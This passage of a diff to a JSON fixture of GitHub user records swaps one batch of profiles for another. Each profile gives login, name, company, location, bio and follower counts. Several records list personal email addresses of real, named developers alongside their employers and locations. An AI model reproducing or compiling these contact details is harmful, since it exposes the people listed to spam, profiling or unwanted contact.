- "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-05-13T07:39:00Z", - "updated_at": "2024-08-12T13:35:01Z", - "node_id": "U_kgDOBkmMTw", - "bio": "", + "following_count": 2, + "followers_count": 863, + "public_gists_count": 191, + "public_repositories_count": 1410, + "created_at": "2008-10-21T12:50:55Z", + "updated_at": "2024-05-13T06:11:39Z", + "node_id": "MDQ6VXNlcjMwMTQw", + "bio": "I work on new technologies at Apple\r\n\r\nI previously created Apache Groovy & Apache Camel and worked on Jenkins X", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1473, + "pk": 6763, "fields": { - "nest_created_at": "2024-09-11T23:30:50.899Z", - "nest_updated_at": "2024-09-13T05:18:16.868Z", - "name": "", - "login": "MLSTRM", - "email": "chris_nitro@hotmail.co.uk", - "avatar_url": "https://avatars.githubusercontent.com/u/1293985?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:04.401Z", + "nest_updated_at": "2024-09-22T18:50:37.948Z", + "name": "Jared Parsons", + "login": "jaredpar", + "email": "jared@paranoidcoding.org", + "avatar_url": "https://avatars.githubusercontent.com/u/146967?v=4", + "company": "Microsoft", + "location": "A chair near a keyboard", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 17, - "created_at": "2011-12-29T23:02:23Z", - "updated_at": "2024-06-28T10:15:59Z", - "node_id": "MDQ6VXNlcjEyOTM5ODU=", - "bio": "Christopher Wall", + "following_count": 5, + "followers_count": 969, + "public_gists_count": 181, + "public_repositories_count": 116, + "created_at": "2009-10-31T00:09:36Z", + "updated_at": "2024-09-10T15:46:50Z", + "node_id": "MDQ6VXNlcjE0Njk2Nw==", + "bio": "C# compiler lead", "is_hireable": false, - "twitter_username": "" + "twitter_username": "jaredpar" } }, { "model": "github.user", - "pk": 1474, + "pk": 6764, "fields": { - "nest_created_at": "2024-09-11T23:33:26.784Z", - "nest_updated_at": "2024-09-11T23:33:26.784Z", - "name": "Medical Aegis", - "login": "Medical-Aegis", - "email": "support@medicalaegis.com", - "avatar_url": "https://avatars.githubusercontent.com/u/108425450?v=4", - "company": "", - "location": "United States of America", + "nest_created_at": "2024-09-22T07:48:04.714Z", + "nest_updated_at": "2024-09-22T18:50:38.251Z", + "name": "Jason Dent", + "login": "Jason3S", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3740137?v=4", + "company": "Street Side Software", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-06-29T17:32:55Z", - "updated_at": "2023-06-22T19:13:29Z", - "node_id": "O_kgDOBnZw6g", - "bio": "Digital health technology cyber risk management.", + "following_count": 3, + "followers_count": 42, + "public_gists_count": 2, + "public_repositories_count": 46, + "created_at": "2013-03-01T16:28:09Z", + "updated_at": "2024-08-29T17:57:35Z", + "node_id": "MDQ6VXNlcjM3NDAxMzc=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1475, + "pk": 6765, "fields": { - "nest_created_at": "2024-09-11T23:33:28.428Z", - "nest_updated_at": "2024-09-11T23:33:28.428Z", - "name": "Itay Shakury", - "login": "itaysk", + "nest_created_at": "2024-09-22T07:48:05.036Z", + "nest_updated_at": "2024-09-22T18:50:38.564Z", + "name": "Jens Duttke", + "login": "jens-duttke", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1161307?v=4", - "company": "Aqua Security", - "location": "Israel", + "avatar_url": "https://avatars.githubusercontent.com/u/4883142?v=4", + "company": "", + "location": "Warstein, Germany", "collaborators_count": 0, - "following_count": 24, - "followers_count": 117, - "public_gists_count": 24, - "public_repositories_count": 97, - "created_at": "2011-10-30T20:55:08Z", - "updated_at": "2024-08-30T20:24:28Z", - "node_id": "MDQ6VXNlcjExNjEzMDc=", - "bio": "VP Open Source at \r\nAqua Security | CNCF Ambassador", - "is_hireable": false, - "twitter_username": "itaysk" + "following_count": 1, + "followers_count": 55, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2013-06-29T14:11:22Z", + "updated_at": "2024-09-14T08:59:11Z", + "node_id": "MDQ6VXNlcjQ4ODMxNDI=", + "bio": "Passioned JavaScript developer for more than 20 years. Now working with TypeScript and React. Author of HexEd.it, PhotoME, [pec] and a couple of other things.", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1476, + "pk": 6766, "fields": { - "nest_created_at": "2024-09-11T23:33:30.169Z", - "nest_updated_at": "2024-09-11T23:33:30.169Z", - "name": "David Dillard", - "login": "ddillard", + "nest_created_at": "2024-09-22T07:48:05.362Z", + "nest_updated_at": "2024-09-22T18:50:38.876Z", + "name": "Jimmy Lewis", + "login": "jimmylewis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9905204?v=4", - "company": "Veritas Technologies LLC", - "location": "Central Florida", + "avatar_url": "https://avatars.githubusercontent.com/u/3976973?v=4", + "company": "Microsoft", + "location": "Redmond, WA, USA", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-11-22T21:17:17Z", - "updated_at": "2024-06-04T02:34:46Z", - "node_id": "MDQ6VXNlcjk5MDUyMDQ=", + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 30, + "created_at": "2013-03-26T16:52:56Z", + "updated_at": "2024-08-02T23:24:55Z", + "node_id": "MDQ6VXNlcjM5NzY5NzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397153,49 +655077,49 @@ }, { "model": "github.user", - "pk": 1477, + "pk": 6767, "fields": { - "nest_created_at": "2024-09-11T23:33:32.259Z", - "nest_updated_at": "2024-09-11T23:33:32.259Z", - "name": "a", - "login": "umbellate", + "nest_created_at": "2024-09-22T07:48:05.697Z", + "nest_updated_at": "2024-09-22T18:50:39.186Z", + "name": "John Brunton", + "login": "jbrunton", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107409588?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1276413?v=4", + "company": "@converge-io", + "location": "London", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-06-13T12:16:10Z", - "updated_at": "2024-07-30T14:16:13Z", - "node_id": "U_kgDOBmbwtA", - "bio": "", + "following_count": 5, + "followers_count": 12, + "public_gists_count": 4, + "public_repositories_count": 152, + "created_at": "2011-12-20T23:22:49Z", + "updated_at": "2024-09-20T11:59:20Z", + "node_id": "MDQ6VXNlcjEyNzY0MTM=", + "bio": "I dig software craftsmanship, Lean methodologies and self-organising teams", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1478, + "pk": 6768, "fields": { - "nest_created_at": "2024-09-11T23:33:37.786Z", - "nest_updated_at": "2024-09-11T23:33:37.786Z", - "name": "", - "login": "linroad123", + "nest_created_at": "2024-09-22T07:48:05.985Z", + "nest_updated_at": "2024-09-22T18:50:39.491Z", + "name": "John Carter", + "login": "therefromhere", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32862076?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/197540?v=4", "company": "", - "location": "", + "location": "Auckland, New Zealand", "collaborators_count": 0, - "following_count": 13, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 30, - "created_at": "2017-10-17T06:08:27Z", - "updated_at": "2024-08-19T18:32:45Z", - "node_id": "MDQ6VXNlcjMyODYyMDc2", + "following_count": 23, + "followers_count": 26, + "public_gists_count": 8, + "public_repositories_count": 73, + "created_at": "2010-02-05T09:46:03Z", + "updated_at": "2024-03-23T22:37:21Z", + "node_id": "MDQ6VXNlcjE5NzU0MA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397203,49 +655127,49 @@ }, { "model": "github.user", - "pk": 1479, + "pk": 6769, "fields": { - "nest_created_at": "2024-09-11T23:33:39.894Z", - "nest_updated_at": "2024-09-11T23:33:39.894Z", - "name": "Andreas Fehlner", - "login": "andife", + "nest_created_at": "2024-09-22T07:48:06.297Z", + "nest_updated_at": "2024-09-22T18:50:39.819Z", + "name": "John", + "login": "johnvanhienen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20612932?v=4", - "company": "", - "location": "Rottweil, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/7302372?v=4", + "company": "Ahold Delhaize", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 19, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 80, - "created_at": "2016-07-23T13:19:41Z", - "updated_at": "2024-08-23T03:23:59Z", - "node_id": "MDQ6VXNlcjIwNjEyOTMy", - "bio": "Software Developer AI, ONNX Steering Committee Emeritus\r\n", + "following_count": 6, + "followers_count": 4, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2014-04-15T12:42:22Z", + "updated_at": "2024-09-18T16:47:12Z", + "node_id": "MDQ6VXNlcjczMDIzNzI=", + "bio": "Platform engineering my way around Kubernetes 🦀 ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1480, + "pk": 6770, "fields": { - "nest_created_at": "2024-09-11T23:33:43.243Z", - "nest_updated_at": "2024-09-13T16:27:44.574Z", + "nest_created_at": "2024-09-22T07:48:06.654Z", + "nest_updated_at": "2024-09-22T18:50:40.132Z", "name": "", - "login": "KramNamez", + "login": "Joe-Zer0", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/108786702?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/70542456?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2022-07-06T06:30:30Z", - "updated_at": "2024-08-31T07:48:07Z", - "node_id": "U_kgDOBnv0Dg", + "public_repositories_count": 4, + "created_at": "2020-08-31T19:33:26Z", + "updated_at": "2024-08-21T21:36:02Z", + "node_id": "MDQ6VXNlcjcwNTQyNDU2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397253,24 +655177,24 @@ }, { "model": "github.user", - "pk": 1481, + "pk": 6771, "fields": { - "nest_created_at": "2024-09-11T23:33:47.961Z", - "nest_updated_at": "2024-09-11T23:33:47.961Z", - "name": "Frederik Leonhardt", - "login": "fkleon", + "nest_created_at": "2024-09-22T07:48:06.979Z", + "nest_updated_at": "2024-09-22T18:50:40.439Z", + "name": "Joe Feeney", + "login": "iamatypeofwalrus", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/448110?v=4", - "company": "@catalyst", - "location": "Wellington, New Zealand", + "avatar_url": "https://avatars.githubusercontent.com/u/1878264?v=4", + "company": "Amazon", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 11, - "followers_count": 26, - "public_gists_count": 8, - "public_repositories_count": 53, - "created_at": "2010-10-21T10:48:54Z", - "updated_at": "2024-07-25T02:38:02Z", - "node_id": "MDQ6VXNlcjQ0ODExMA==", + "following_count": 34, + "followers_count": 41, + "public_gists_count": 22, + "public_repositories_count": 16, + "created_at": "2012-06-21T19:12:50Z", + "updated_at": "2024-08-02T21:05:43Z", + "node_id": "MDQ6VXNlcjE4NzgyNjQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397278,99 +655202,99 @@ }, { "model": "github.user", - "pk": 1482, + "pk": 6772, "fields": { - "nest_created_at": "2024-09-11T23:33:56.182Z", - "nest_updated_at": "2024-09-13T05:18:45.027Z", - "name": "Juan Cruz", - "login": "JCHacking", - "email": "juancruzmencia@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/10503588?v=4", - "company": "@arsys-internet", - "location": "Haro, La Rioja (España)", + "nest_created_at": "2024-09-22T07:48:07.293Z", + "nest_updated_at": "2024-09-22T18:50:40.747Z", + "name": "Jim Brännlund", + "login": "BeyondEvil", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15611634?v=4", + "company": "", + "location": "Sweden", "collaborators_count": 0, - "following_count": 9, - "followers_count": 9, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2015-01-12T18:27:11Z", - "updated_at": "2024-08-14T21:03:18Z", - "node_id": "MDQ6VXNlcjEwNTAzNTg4", - "bio": "Informático de profesión y por afición.", - "is_hireable": true, - "twitter_username": "JCHacking" + "following_count": 0, + "followers_count": 20, + "public_gists_count": 24, + "public_repositories_count": 47, + "created_at": "2015-11-02T13:08:12Z", + "updated_at": "2024-09-03T06:58:36Z", + "node_id": "MDQ6VXNlcjE1NjExNjM0", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1483, + "pk": 6773, "fields": { - "nest_created_at": "2024-09-11T23:35:10.242Z", - "nest_updated_at": "2024-09-11T23:36:29.521Z", - "name": "Paul Horton", - "login": "madpah", - "email": "paul.horton@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/10280392?v=4", - "company": "@sonatype @CycloneDX ", - "location": "UK", + "nest_created_at": "2024-09-22T07:48:07.605Z", + "nest_updated_at": "2024-09-22T18:50:41.059Z", + "name": "Jed Thompson", + "login": "jedster1111", + "email": "jedster1111@hotmail.co.uk", + "avatar_url": "https://avatars.githubusercontent.com/u/25291974?v=4", + "company": "", + "location": "London, United Kingdom", "collaborators_count": 0, - "following_count": 1, - "followers_count": 15, - "public_gists_count": 0, - "public_repositories_count": 58, - "created_at": "2014-12-23T13:09:46Z", - "updated_at": "2024-09-01T14:56:11Z", - "node_id": "MDQ6VXNlcjEwMjgwMzky", - "bio": "IT geek, Digital, DevSecOps, Food...", + "following_count": 2, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 49, + "created_at": "2017-01-23T05:44:03Z", + "updated_at": "2024-08-23T11:42:45Z", + "node_id": "MDQ6VXNlcjI1MjkxOTc0", + "bio": "Learning as much web development as I can.", "is_hireable": false, - "twitter_username": "madpah" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1484, + "pk": 6774, "fields": { - "nest_created_at": "2024-09-11T23:35:20.729Z", - "nest_updated_at": "2024-09-18T18:58:12.500Z", - "name": "Joshua Kugler", - "login": "jkugler", - "email": "joshua@azariah.com", - "avatar_url": "https://avatars.githubusercontent.com/u/78939?v=4", - "company": "@adobe, Azariah Enterprises", - "location": "Fairbanks, AK", + "nest_created_at": "2024-09-22T07:48:07.923Z", + "nest_updated_at": "2024-09-22T18:50:41.365Z", + "name": "Jed Fox", + "login": "j-f1", + "email": "git@jedfox.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25517624?v=4", + "company": "@apple", + "location": "Cupertino, CA", "collaborators_count": 0, - "following_count": 7, - "followers_count": 10, - "public_gists_count": 7, - "public_repositories_count": 33, - "created_at": "2009-04-28T21:52:36Z", - "updated_at": "2024-09-05T22:42:53Z", - "node_id": "MDQ6VXNlcjc4OTM5", - "bio": "", + "following_count": 100, + "followers_count": 406, + "public_gists_count": 12, + "public_repositories_count": 278, + "created_at": "2017-02-02T23:14:37Z", + "updated_at": "2024-08-25T21:38:41Z", + "node_id": "MDQ6VXNlcjI1NTE3NjI0", + "bio": "Instruments/Profiling Tools at Apple", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1485, + "pk": 6775, "fields": { - "nest_created_at": "2024-09-11T23:35:21.952Z", - "nest_updated_at": "2024-09-11T23:35:21.952Z", - "name": "", - "login": "hseg", + "nest_created_at": "2024-09-22T07:48:08.235Z", + "nest_updated_at": "2024-09-22T18:50:41.680Z", + "name": "Jass Bagga", + "login": "jbagga", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1260405?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6234561?v=4", "company": "", - "location": "", + "location": "US", "collaborators_count": 0, - "following_count": 7, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 29, - "created_at": "2011-12-13T14:13:03Z", - "updated_at": "2024-08-28T18:23:46Z", - "node_id": "MDQ6VXNlcjEyNjA0MDU=", + "following_count": 15, + "followers_count": 40, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2013-12-21T03:07:30Z", + "updated_at": "2024-09-04T21:49:15Z", + "node_id": "MDQ6VXNlcjYyMzQ1NjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397378,24 +655302,24 @@ }, { "model": "github.user", - "pk": 1486, + "pk": 6776, "fields": { - "nest_created_at": "2024-09-11T23:35:23.590Z", - "nest_updated_at": "2024-09-16T22:19:39.022Z", - "name": "", - "login": "maitrey", + "nest_created_at": "2024-09-22T07:48:08.541Z", + "nest_updated_at": "2024-09-22T18:50:41.994Z", + "name": "Jasper", + "login": "jasper-d", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/953916?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3026896?v=4", "company": "", - "location": "", + "location": "Hamburg, Germany", "collaborators_count": 0, "following_count": 15, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2011-08-02T11:35:27Z", - "updated_at": "2024-09-12T14:02:03Z", - "node_id": "MDQ6VXNlcjk1MzkxNg==", + "followers_count": 14, + "public_gists_count": 5, + "public_repositories_count": 37, + "created_at": "2012-12-12T16:44:18Z", + "updated_at": "2024-09-13T11:49:53Z", + "node_id": "MDQ6VXNlcjMwMjY4OTY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -397403,324 +655327,274 @@ }, { "model": "github.user", - "pk": 1487, - "fields": { - "nest_created_at": "2024-09-11T23:35:24.388Z", - "nest_updated_at": "2024-09-16T22:19:39.650Z", - "name": "Saquib Saifee", - "login": "saquibsaifee", - "email": "saquibsaifee2@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/66195765?v=4", - "company": "IBM", - "location": "United States", - "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2020-05-31T06:05:51Z", - "updated_at": "2024-09-10T16:21:10Z", - "node_id": "MDQ6VXNlcjY2MTk1NzY1", - "bio": "", - "is_hireable": true, - "twitter_username": "saquibsaifee" - } -}, -{ - "model": "github.user", - "pk": 1488, + "pk": 6777, "fields": { - "nest_created_at": "2024-09-11T23:35:34.783Z", - "nest_updated_at": "2024-09-12T00:08:12.170Z", + "nest_created_at": "2024-09-22T07:48:08.848Z", + "nest_updated_at": "2024-09-22T18:50:42.305Z", "name": "", - "login": "weichslgartner", - "email": "weichslgartner@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/24318127?v=4", + "login": "JasonKleban", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17498172?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 15, - "followers_count": 15, - "public_gists_count": 2, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 16, "public_repositories_count": 29, - "created_at": "2016-12-02T14:10:54Z", - "updated_at": "2024-08-30T10:37:19Z", - "node_id": "MDQ6VXNlcjI0MzE4MTI3", + "created_at": "2016-02-26T15:14:24Z", + "updated_at": "2024-08-13T15:19:51Z", + "node_id": "MDQ6VXNlcjE3NDk4MTcy", "bio": "", "is_hireable": false, - "twitter_username": "weichslgartner" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1489, + "pk": 6778, "fields": { - "nest_created_at": "2024-09-11T23:37:01.564Z", - "nest_updated_at": "2024-09-11T23:37:01.564Z", - "name": "", - "login": "liaoyuan1011", + "nest_created_at": "2024-09-22T07:48:09.569Z", + "nest_updated_at": "2024-09-22T18:50:43.022Z", + "name": "Jason Merino", + "login": "jasonmerino", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10594044?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1660279?v=4", + "company": "Gemini", + "location": "Remote", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2015-01-19T07:09:38Z", - "updated_at": "2022-05-09T03:17:18Z", - "node_id": "MDQ6VXNlcjEwNTk0MDQ0", + "following_count": 11, + "followers_count": 33, + "public_gists_count": 23, + "public_repositories_count": 93, + "created_at": "2012-04-19T18:09:43Z", + "updated_at": "2024-09-06T15:06:09Z", + "node_id": "MDQ6VXNlcjE2NjAyNzk=", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "jasonmerino" } }, { "model": "github.user", - "pk": 1490, + "pk": 6779, "fields": { - "nest_created_at": "2024-09-11T23:37:03.247Z", - "nest_updated_at": "2024-09-11T23:37:03.247Z", - "name": "Ryan Cammer", - "login": "ryancammer", - "email": "ryancammer@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/376128?v=4", - "company": "Ryan Cammer", - "location": "Bozeman, MT", + "nest_created_at": "2024-09-22T07:48:09.885Z", + "nest_updated_at": "2024-09-22T18:50:43.331Z", + "name": "Jason Kwok", + "login": "JasonHK", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4410086?v=4", + "company": "", + "location": "Hong Kong", "collaborators_count": 0, - "following_count": 2, - "followers_count": 17, - "public_gists_count": 3, - "public_repositories_count": 12, - "created_at": "2010-08-25T20:38:18Z", - "updated_at": "2024-09-04T18:54:55Z", - "node_id": "MDQ6VXNlcjM3NjEyOA==", - "bio": "for (of of ['of']){ console.log(of);}", - "is_hireable": false, + "following_count": 57, + "followers_count": 27, + "public_gists_count": 7, + "public_repositories_count": 180, + "created_at": "2013-05-12T14:42:03Z", + "updated_at": "2024-09-02T07:11:15Z", + "node_id": "MDQ6VXNlcjQ0MTAwODY=", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1491, + "pk": 6780, "fields": { - "nest_created_at": "2024-09-11T23:37:05.263Z", - "nest_updated_at": "2024-09-18T18:58:20.485Z", + "nest_created_at": "2024-09-22T07:48:10.226Z", + "nest_updated_at": "2024-09-22T18:50:43.646Z", "name": "", - "login": "fatsolko", + "login": "JanDalF", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/76652885?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20650204?v=4", "company": "", - "location": "Belgrade", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-12-27T13:39:52Z", - "updated_at": "2024-09-16T12:24:27Z", - "node_id": "MDQ6VXNlcjc2NjUyODg1", - "bio": "DevOps Engineer\r\n", + "public_repositories_count": 0, + "created_at": "2016-07-25T21:12:41Z", + "updated_at": "2016-07-25T21:12:41Z", + "node_id": "MDQ6VXNlcjIwNjUwMjA0", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1492, + "pk": 6781, "fields": { - "nest_created_at": "2024-09-11T23:37:10.478Z", - "nest_updated_at": "2024-09-11T23:37:15.500Z", - "name": "Amy Keibler", - "login": "amy-keibler", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3483663?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:48:10.535Z", + "nest_updated_at": "2024-09-22T18:50:43.951Z", + "name": "John Luo", + "login": "JunTaoLuo", + "email": "john.luo@agile6.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2030323?v=4", + "company": "Agile 6", + "location": "Pittsburgh", "collaborators_count": 0, - "following_count": 6, - "followers_count": 16, - "public_gists_count": 1, - "public_repositories_count": 62, - "created_at": "2013-02-05T16:54:58Z", - "updated_at": "2024-01-02T19:55:16Z", - "node_id": "MDQ6VXNlcjM0ODM2NjM=", + "following_count": 7, + "followers_count": 141, + "public_gists_count": 17, + "public_repositories_count": 32, + "created_at": "2012-07-23T23:21:03Z", + "updated_at": "2024-09-22T11:28:14Z", + "node_id": "MDQ6VXNlcjIwMzAzMjM=", "bio": "", "is_hireable": false, - "twitter_username": "amelia_codes" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1493, + "pk": 6782, "fields": { - "nest_created_at": "2024-09-11T23:37:16.766Z", - "nest_updated_at": "2024-09-11T23:37:16.766Z", - "name": "Adam Crain", - "login": "jadamcrain", + "nest_created_at": "2024-09-22T07:48:10.852Z", + "nest_updated_at": "2024-09-22T18:50:44.256Z", + "name": "Jon Wolski", + "login": "jonwolski", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/305813?v=4", - "company": "Step Function I/O", - "location": "Bend, OR", + "avatar_url": "https://avatars.githubusercontent.com/u/2222374?v=4", + "company": "Walt Disney Pictures", + "location": "Los Angeles, CA", "collaborators_count": 0, - "following_count": 5, - "followers_count": 87, - "public_gists_count": 15, - "public_repositories_count": 7, - "created_at": "2010-06-15T13:42:49Z", - "updated_at": "2024-08-10T06:55:03Z", - "node_id": "MDQ6VXNlcjMwNTgxMw==", - "bio": "Software security engineer building the next generation of industrial control systems in Rust.\r\n", + "following_count": 63, + "followers_count": 32, + "public_gists_count": 18, + "public_repositories_count": 58, + "created_at": "2012-08-26T14:50:35Z", + "updated_at": "2024-08-27T00:38:46Z", + "node_id": "MDQ6VXNlcjIyMjIzNzQ=", + "bio": "", "is_hireable": false, - "twitter_username": "jadamcrain" + "twitter_username": "jonwolski" } }, { "model": "github.user", - "pk": 1494, + "pk": 6783, "fields": { - "nest_created_at": "2024-09-11T23:37:17.624Z", - "nest_updated_at": "2024-09-11T23:37:17.624Z", - "name": "Jens Reimann", - "login": "ctron", - "email": "ctron@dentrassi.de", - "avatar_url": "https://avatars.githubusercontent.com/u/202474?v=4", - "company": "@RedHatOfficial", - "location": "München", + "nest_created_at": "2024-09-22T07:48:11.169Z", + "nest_updated_at": "2024-09-22T18:50:44.563Z", + "name": "Beth Hitch", + "login": "dfoverdx", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3087358?v=4", + "company": "Milliman", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 5, - "followers_count": 260, - "public_gists_count": 9, - "public_repositories_count": 463, - "created_at": "2010-02-12T13:53:25Z", - "updated_at": "2024-08-26T06:24:39Z", - "node_id": "MDQ6VXNlcjIwMjQ3NA==", - "bio": "Loving Open Source, contributing to @eclipse, working for @RedHatOfficial. This is my personal profile.", + "following_count": 0, + "followers_count": 11, + "public_gists_count": 13, + "public_repositories_count": 74, + "created_at": "2012-12-20T06:29:49Z", + "updated_at": "2024-08-24T18:35:06Z", + "node_id": "MDQ6VXNlcjMwODczNTg=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1495, + "pk": 6784, "fields": { - "nest_created_at": "2024-09-11T23:37:18.970Z", - "nest_updated_at": "2024-09-11T23:37:19.794Z", - "name": "Andrew Lilley Brinker", - "login": "alilleybrinker", - "email": "abrinker@mitre.org", - "avatar_url": "https://avatars.githubusercontent.com/u/1223605?v=4", - "company": "@mitre", - "location": "Orange County, California", + "nest_created_at": "2024-09-22T07:48:11.475Z", + "nest_updated_at": "2024-09-22T18:50:44.871Z", + "name": "Jordan Tucker", + "login": "jordanbtucker", + "email": "jordanbtucker@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/468153?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 12, - "followers_count": 128, - "public_gists_count": 12, - "public_repositories_count": 40, - "created_at": "2011-11-27T18:08:21Z", - "updated_at": "2024-08-14T20:04:38Z", - "node_id": "MDQ6VXNlcjEyMjM2MDU=", - "bio": "👷🏻‍♂️ Hipcheck, OmniBOR\r\n🖊️ Open source software, security, memory safety\r\n☕ Coffee, more coffee", + "following_count": 0, + "followers_count": 124, + "public_gists_count": 34, + "public_repositories_count": 118, + "created_at": "2010-11-04T23:23:03Z", + "updated_at": "2024-09-21T11:23:12Z", + "node_id": "MDQ6VXNlcjQ2ODE1Mw==", + "bio": "he/him", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1496, - "fields": { - "nest_created_at": "2024-09-11T23:37:20.667Z", - "nest_updated_at": "2024-09-18T18:57:58.711Z", - "name": "Lars Francke", - "login": "lfrancke", - "email": "github@lars-francke.de", - "avatar_url": "https://avatars.githubusercontent.com/u/122850?v=4", - "company": "@stackabletech ", - "location": "Hamburg, Germany", - "collaborators_count": 0, - "following_count": 10, - "followers_count": 41, - "public_gists_count": 4, - "public_repositories_count": 84, - "created_at": "2009-09-03T13:55:18Z", - "updated_at": "2024-09-05T08:33:15Z", - "node_id": "MDQ6VXNlcjEyMjg1MA==", - "bio": "Co-Founder of @stackabletech and @opencore.\r\n\r\nBuilding a modern data platform at Stackable: Open Source based on Kubernetes", - "is_hireable": false, - "twitter_username": "lars_francke" - } -}, -{ - "model": "github.user", - "pk": 1497, + "pk": 6785, "fields": { - "nest_created_at": "2024-09-11T23:37:21.538Z", - "nest_updated_at": "2024-09-18T18:57:59.027Z", - "name": "Sergey \"Shnatsel\" Davidoff", - "login": "Shnatsel", - "email": "shnatsel@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/291257?v=4", + "nest_created_at": "2024-09-22T07:48:11.797Z", + "nest_updated_at": "2024-09-22T18:50:45.180Z", + "name": "Jordan Worner", + "login": "jordanworner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1166023?v=4", "company": "", - "location": "", + "location": "UK", "collaborators_count": 0, "following_count": 1, - "followers_count": 307, - "public_gists_count": 7, - "public_repositories_count": 158, - "created_at": "2010-05-30T09:12:08Z", - "updated_at": "2024-09-14T10:29:24Z", - "node_id": "MDQ6VXNlcjI5MTI1Nw==", + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2011-11-01T22:24:45Z", + "updated_at": "2024-08-17T21:20:21Z", 